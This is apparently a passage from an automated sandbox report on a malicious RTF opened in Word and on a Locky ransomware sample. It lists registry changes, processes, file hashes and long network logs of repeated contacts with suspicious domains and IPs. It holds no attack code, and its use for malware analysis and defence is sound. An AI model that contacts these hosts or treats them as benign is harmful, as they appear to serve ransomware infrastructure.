Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
DE 84.200.16.242:80 tcp
DE 84.200.16.242:80 tcp

Files

memory/2880-0-0x000000002F1E1000-0x000000002F1E2000-memory.dmp

memory/2880-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2880-2-0x000000007104D000-0x0000000071058000-memory.dmp

memory/2880-5-0x000000007104D000-0x0000000071058000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 8a3e2aeb937fc1ad9ac07e24650e0287
SHA1 9a9eaaae50e155d5bef572bbc2f4690dfd696fe9
SHA256 152b9e1e72ee0a7f77c68379b12068959975d25c5da9469f8f1067de713a81a7
SHA512 83bab3041052027e219bd2b597a561f7e37a842faf55ae3f7b214e8bcfdcf5bed7ddc1b99f247833d941d8ff41403f7d2ec3ac50b68ac80b7d04823960ff6775

memory/2880-29-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2880-30-0x000000007104D000-0x0000000071058000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1796s

Max time network

1799s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5060 wrote to memory of 1364 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe
PID 5060 wrote to memory of 1364 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf" /o ""

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
DE 84.200.16.242:80 tcp
US 8.8.8.8:53 roaming.officeapps.live.com udp
DE 84.200.16.242:80 tcp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp

Files

memory/5060-0-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

memory/5060-3-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

memory/5060-1-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

memory/5060-2-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

memory/5060-5-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

memory/5060-4-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

memory/5060-6-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-9-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-8-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-7-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-11-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-12-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

memory/5060-13-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-10-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-14-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-17-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-20-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-19-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-22-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-21-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

memory/5060-18-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-16-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-15-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

memory/5060-30-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1799s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Signatures

Locky

ransomware locky

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 8.8.8.8:53 greootc.eu udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
